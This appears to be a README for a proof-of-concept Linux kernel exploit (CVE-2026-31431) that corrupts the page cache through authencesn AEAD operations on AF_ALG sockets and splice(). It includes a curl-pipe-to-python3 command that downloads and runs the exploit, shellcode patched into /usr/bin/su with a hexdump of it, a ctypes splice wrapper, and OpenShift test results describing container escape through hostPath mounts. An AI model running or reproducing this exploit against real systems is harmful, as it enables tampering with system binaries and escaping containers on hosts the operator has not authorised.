
Exploit for Linux kernel CVE-2026-31431 causing page cache corruption via authencesn AEAD manipulation, targeting privilege escalation in containers and OpenShift environments.
Linux kernel page cache corruption via authencesn AEAD manipulation.
After extensive testing on multiple OpenShift 4.20.16 clusters with RHEL 9.6 kernels:
See Comprehensive Testing Results section for full details.
CVE-2026-31431 is a Linux kernel vulnerability in the authencesn AEAD cryptographic implementation that allows unprivileged processes to corrupt the page cache of readable files via AF_ALG sockets and splice() syscall manipulation.
Testing shows: Page cache corruption works reliably, but privilege escalation does NOT occur on RHEL 9.6 kernels in our test environments.
CVSS Score: 7.8 (High)
Affected: Linux kernel versions with authencesn support (2017-2026)
Public Disclosure: April 29, 2026
splice() syscall wrapper via ctypes/usr/bin/su)curl -s https://raw.githubusercontent.com/seanrickerd/cve-2026-31431/main/exploit.py | python3
su
python3 exploit.py
su
What WILL happen:
[*] CVE-2026-31431 'Copy Fail' Exploit
[*] Universal Linux kernel privilege escalation
[*] Target binary: /usr/bin/su
[*] Testing for vulnerability...
[+] System appears vulnerable!
[+] Opened /usr/bin/su (fd=3)
[+] File size: 56944 bytes
[+] File inode: 201328196
[+] Shellcode size: 160 bytes
[+] Patching file in page cache...
Written 160/160 bytes...
[+] Page cache patching complete! (160 bytes written)
Page Cache Verification (confirms corruption):
dd if=/usr/bin/su bs=1 skip=120 count=48 | hexdump -C
00000000 31 c0 31 ff b0 69 0f 05 48 8d 3d 0f 00 00 00 31 |1.1..i..H.=....1|
00000010 f6 6a 3b 58 99 0f 05 31 ff 6a 3c 58 0f 05 2f 62 |.j;X...1.j<X../b|
00000020 69 6e 2f 73 68 |in/sh|
# Shellcode IS present in page cache ✅
What WILL NOT happen (based on testing):
# Executing the backdoored su
su
# Password: [press Enter]
# Check UID
id -u
# Result: 1000810000 (UNCHANGED - still unprivileged user)
# NOT this (does NOT occur in testing):
# # whoami
# root ← This does NOT happen
Conclusion: Page cache corruption succeeds, but privilege escalation fails.
The Linux kernel's authencesn (Authenticated Encryption with Associated Data - Extended Sequence Number) implementation has a flaw in its in-place operation handling. When processing AEAD operations submitted over an AF_ALG socket, a page-cache page can end up in the kernel's writable destination scatterlist.
authencesn(hmac(sha256),cbc(aes))/usr/bin/su)The exploit uses a 160-byte shellcode that patches /usr/bin/su to:
Python 3.9 and earlier don't have os.splice() in the standard library. This exploit includes a ctypes-based implementation:
import ctypes
import ctypes.util
libc = ctypes.CDLL(ctypes.util.find_library('c'))
class off64_t(ctypes.c_int64):
pass
libc.splice.argtypes = [...]
libc.splice.restype = ctypes.c_ssize_t
def splice(src, dst, count, offset_src=None, offset_dst=None):
# Wrapper matching Python os.splice() API
...
This makes the exploit work on:
Node Configuration:
Test Results:
✅ Exploit executed successfully
✅ Page cache corrupted (160 bytes shellcode injected)
✅ Shellcode visible at binary entry point (offset 120)
✅ /bin/sh signature confirmed in hexdump
❌ Privilege escalation: FAILED (UID unchanged)
❌ Root access: NO
❌ Container escape: NO (Device 2097322, Inode 931145742 - container overlay only)
Cluster: https://api.vvb32-fzdtf-8yn.nnbd.p3.openshiftapps.com:443 Node Configuration:
Test Results:
✅ Page cache corruption: SUCCESS (consistent with Test 1)
✅ Shellcode injection: CONFIRMED (byte-for-byte identical)
✅ Device/Inode: 2097286 / 201328196 (container overlay - isolated)
❌ Privilege escalation: FAILED (consistent with Test 1)
❌ Code execution: NOT OBSERVED (consistent with Test 1)
❌ UID change: NO (1000810000 → 1000810000 unchanged)
Consistency: 100% reproducible results across independent clusters
Scenario A: With hostPath Volume (Container Escape Possible)
volumes:
- name: host-usr
hostPath:
path: /usr
Result: ✅ Container escape - modifies host page cache (Device 33, Inode 4288)
Scenario B: Restricted-v2 SCC (No hostPath)
# No hostPath volumes, restricted-v2 SCC
securityContext:
runAsNonRoot: true
allowPrivilegeEscalation: false
capabilities:
drop: [ALL]
Result: ❌ No container escape - only affects container overlay (separate inode)
Critical Finding: hostPath access (not capabilities) is the determining factor for container escape.
Possible Explanations (Requires Further Research):
Read vs Execute Code Paths
mmap(PROT_READ) operationsmmap(PROT_EXEC) may bypass corrupted cacheMemory Protections
Kernel Version Specific